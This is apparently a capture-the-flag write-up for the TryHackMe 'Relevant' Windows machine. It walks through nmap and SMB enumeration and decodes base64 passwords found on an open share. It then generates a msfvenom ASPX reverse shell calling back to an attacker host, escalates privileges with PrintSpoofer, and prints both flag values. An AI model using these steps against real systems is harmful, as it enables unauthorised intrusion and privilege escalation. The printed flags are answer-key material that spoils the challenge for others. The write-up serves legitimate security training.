# Relevant ###### tags: `vulnerableMachine` # Scope of work - black box penetration test - The client has asked that you secure two flags (no location provided) as proof of exploitation: - User.txt - Root.txt --- - Any tools or techniques are permitted in this engagement - Locate and note all vulnerabilities found - Find and report ALL vulnerabilities (yes, there is more than one path to root) Require format - executive summary - vulnerability - exploitation assessment - remediation suggestions # Recon ``` python3 ../../deepScan.py 10.10.221.83 script is running. Author:meowhecker Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 11:59 CST Nmap scan report for 10.10.221.83 Host is up (0.28s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2023-02-13T04:06:50+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=Relevant | Not valid before: 2023-02-12T03:35:08 |_Not valid after: 2023-08-14T03:35:08 | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2023-02-13T04:06:12+00:00 49663/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 5 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-02-13T04:06:15 |_ start_date: 2023-02-13T03:35:10 | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2023-02-12T20:06:13-08:00 TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 172.27 ms 10.17.0.1 2 ... 4 5 284.40 ms 10.10.221.83 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 451.86 seconds ``` potential vulnerable service 80 web 445 SMB server 49663 IIS Windows Server -> probably testing server brute the file folder --- ``` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.43.201 ``` ``` Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 14:10 CST Nmap scan report for 10.10.43.201 Host is up (0.36s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.43.201\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.10.43.201\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.10.43.201\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: <none> | Current user access: READ/WRITE | \\10.10.43.201\nt4wrksv: | Type: STYPE_DISKTREE | Comment: | Anonymous access: <none> |_ Current user access: READ/WRITE Nmap done: 1 IP address (1 host up) scanned in 136.63 seconds ``` SMB login ``` smbclient //10.10.43.201/nt4wrksv ``` We could discover the SMB server have sensitive data -> password.txt ``` get passwords.txt ``` ``` [User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ``` Qm9iIC0gIVBAJCRXMHJEITEyMw== (Base64 Encode) Decoded https://www.asciitohex.com/ ``` Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$ ``` ``` ==> DIRECTORY: http://10.10.43.201:49663/aspnet_client/ --> Testing: http://10.10.43.201:49663/captcha --> Testing: http://10.10.43.201:49663/carbuyaction http://10.10.43.201:49663/aspnet_client/ ``` ## Initial Access ![](https://i.imgur.com/WDdW2Cl.png) ![](https://i.imgur.com/psni2I2.png) We can infer that the SMB directory is associated with the 49663 server, and that the directory actually exists. Now, we could attempt to upload the web shell in order to gain initiall access. http://10.10.43.201:49663/aspnet_client/ Based on URL path, we can infer that web application likely an ASP web server ASP webShell ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.11.72 LPORT=443 -f aspx -o webShell.aspx ``` ![](https://i.imgur.com/HxJKVTe.png) To trigger the web shell using the web browser. ![](https://i.imgur.com/AQCfCNq.png) ## Privilege Escalation --- ![](https://i.imgur.com/0nnn88A.png) It appears the current user has the SeImpersonatePrivilege token enabled, which means token impersonation could be used to escalate privileges. Upload execute file https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0 ![](https://i.imgur.com/dCwwJDv.png) ![](https://i.imgur.com/dLNJ1U4.png) Executing the exploit ``` PrintSpoofer64.exe -i -c cmd ``` ![](https://i.imgur.com/5qBzX13.png) ``` powershell.exe ``` THM{fdk4ka34vk346ksxfr21tg789ktf45} ![](https://i.imgur.com/wXDU3u8.png) --- ![](https://i.imgur.com/TeYSau8.png) THM{1fk5kf469devly1gl320zafgl345pv}